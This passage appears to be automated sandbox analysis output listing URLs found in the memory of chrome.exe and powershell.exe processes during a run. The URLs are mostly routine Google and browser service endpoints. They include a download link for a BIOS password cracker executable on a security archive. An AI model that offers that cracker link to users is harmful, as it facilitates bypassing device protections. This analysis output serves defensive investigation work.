Source: chrome.exe, 00000009.00000003.57225344845.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286673291.0000781C0243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291047704.0000781C02BF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57226031394.0000781C0243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290972415.0000781C02BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000009.00000002.57300353725.0000781C03920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57301057032.0000781C03A34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292599013.0000781C02E48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000009.00000003.57225189488.0000781C03684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228863428.0000781C03684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229281440.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57225142821.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57225344845.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000009.00000003.57254846218.0000781C03C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254563289.0000781C03C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57202610379.0000781800650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256935513.0000781C03D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257089224.0000781C03D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255097467.0000781C03CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201246523.000078180053C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257291129.0000781C03D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256235739.0000781C03CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254276889.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256763123.0000781C03CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57284034256.0000781800654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255759131.0000781C03CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255456919.0000781C03CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201177369.0000781800534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256016342.0000781C03CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256467964.0000781C03CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57202839824.0000781800650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000009.00000003.57201246523.000078180053C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201177369.0000781800534000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/p_
Source: chrome.exe, 00000009.00000003.57254846218.0000781C03C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254563289.0000781C03C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57202610379.0000781800650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256935513.0000781C03D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257089224.0000781C03D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255097467.0000781C03CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201246523.000078180053C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257291129.0000781C03D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256235739.0000781C03CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254276889.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256763123.0000781C03CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57284034256.0000781800654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255759131.0000781C03CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255456919.0000781C03CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201177369.0000781800534000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256016342.0000781C03CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256467964.0000781C03CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57202839824.0000781800650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 00000009.00000003.57202610379.0000781800650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57284034256.0000781800654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57202839824.0000781800650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
Source: chrome.exe, 00000009.00000003.57201246523.000078180053C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201177369.0000781800534000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/p_
Source: chrome.exe, 00000009.00000003.57255759131.0000781C03CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255456919.0000781C03CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256016342.0000781C03CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256467964.0000781C03CE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 00000009.00000003.57207536482.0000781C0243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286673291.0000781C0243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57226031394.0000781C0243C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 00000009.00000002.57291343797.0000781C02C64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/category/extensions
Source: chrome.exe, 00000009.00000002.57291343797.0000781C02C64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromewebstore.google.com/category/themes
Source: chrome.exe, 00000009.00000003.57195109940.00002988000D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57195233699.00002988000DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 00000009.00000003.57207536482.0000781C0243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286673291.0000781C0243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291047704.0000781C02BF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286243076.0000781C02368000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57226031394.0000781C0243C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287514613.0000781C025A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290972415.0000781C02BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 00000009.00000002.57289715694.0000781C02A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
Source: chrome.exe, 00000009.00000002.57290053748.0000781C02A9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
Source: chrome.exe, 00000009.00000002.57290053748.0000781C02A9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 00000009.00000002.57290053748.0000781C02A9C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=128
Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://consent.trustarc.com/
Source: chrome.exe, 00000009.00000002.57293292277.0000781C02F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com
Source: powershell.exe, 00000006.00000002.57163217722.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.57163217722.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.57163217722.0000000005AEF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/593024
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/650547
Source: chrome.exe, 00000009.00000002.57295156049.0000781C03230000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57220737464.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/655534
Source: chrome.exe, 00000009.00000002.57295431984.0000781C032C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
Source: chrome.exe, 00000009.00000002.57294454286.0000781C0313C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: chrome.exe, 00000009.00000002.57294454286.0000781C0313C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXEtall.exe
Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/
Source: chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300752862.0000781C03994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300752862.0000781C03994000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultult
Source: chrome.exe, 00000009.00000002.57292744916.0000781C02E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000009.00000002.57292744916.0000781C02E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299573074.0000781C03720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/
Source: chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
Source: chrome.exe, 00000009.00000002.57294454286.0000781C0313C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
Source: chrome.exe, 00000009.00000002.57292744916.0000781C02E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/
Source: chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default
Source: chrome.exe, 00000009.00000002.57292744916.0000781C02E90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299573074.0000781C03720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293080729.0000781C02F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287280575.0000781C02568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: chrome.exe, 00000009.00000003.57229474334.0000781C02744000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57229087385.0000781C026F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298288513.0000781C035D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?lfhs=2
Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293627577.0000781C03004000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299573074.0000781C03720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: chrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://eicar.org/
Source: chrome.exe, 00000009.00000002.57286920782.0000781C02470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: chrome.exe, 00000009.00000002.57293456384.0000781C02FC8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=searchTerms
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.56223425893.0000000006D8E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.56217685265.000000000492B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.57163217722.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester4
Source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: powershell.exe, 00000006.00000002.57194490371.0000000006E70000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000003.00000002.56217685265.00000000051C5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: chrome.exe, 00000009.00000003.57254846218.0000781C03C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254563289.0000781C03C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201001667.0000781800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256935513.0000781C03D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257089224.0000781C03D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255097467.0000781C03CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257291129.0000781C03D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57284172765.0000781800698000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256235739.0000781C03CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254276889.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256763123.0000781C03CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255759131.0000781C03CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255456919.0000781C03CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256016342.0000781C03CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256467964.0000781C03CE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000009.00000003.57201001667.0000781800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000009.00000002.57284172765.0000781800698000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/https://google-ohttp-relay-query.fastly-edge.com/htt
Source: chrome.exe, 00000009.00000003.57254846218.0000781C03C98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254563289.0000781C03C88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57201001667.0000781800514000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256935513.0000781C03D08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257089224.0000781C03D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255097467.0000781C03CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57257291129.0000781C03D20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57284172765.0000781800698000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256235739.0000781C03CD8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57254276889.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256763123.0000781C03CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255759131.0000781C03CC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57255456919.0000781C03CA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256016342.0000781C03CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57256467964.0000781C03CE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000009.00000003.57201001667.0000781800514000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285823302.0000781C022F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&adk=181227
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2584082051607049&output=html&h=280&slot
